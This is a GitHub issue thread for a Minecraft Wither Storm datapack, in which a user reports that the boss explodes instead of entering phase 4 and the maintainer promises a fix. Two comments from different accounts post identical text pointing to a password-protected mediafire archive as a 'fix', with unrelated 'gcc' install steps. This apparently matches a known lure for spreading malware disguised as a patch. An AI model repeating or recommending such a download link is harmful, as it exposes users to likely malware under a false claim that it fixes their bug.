### ISSUE TITLE
[Bug]: I Can't Reach Phase 4?

### ISSUE THREAD

**Issue by Mcerrorbroken** [TaintedBlock/crackers-wither-storm-plus#8]
**Describe the bug**
When I kill the wither storm (aka trying to get it on the final fight phase 4) it explodes instead of entering phase 4
**Minecraft version**
1.201
**Datapack and/or Resource Pack version**
Latest Version
**To Reproduce**
1. Beat The Mini Fight
2. Wait Until The Storm Comes Back
3. Explode It With Tnt
4. The Wither Storm Doesn't Enter Phase 4

**Screenshots**
None
**Crash Reports**
None
**Mod list**
Witherstormmod-Latest Version
Entity_Model_Feature
Entity_Texture_Feature

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by TaintedBlock** [comment]
Will be fixed in the next major release.
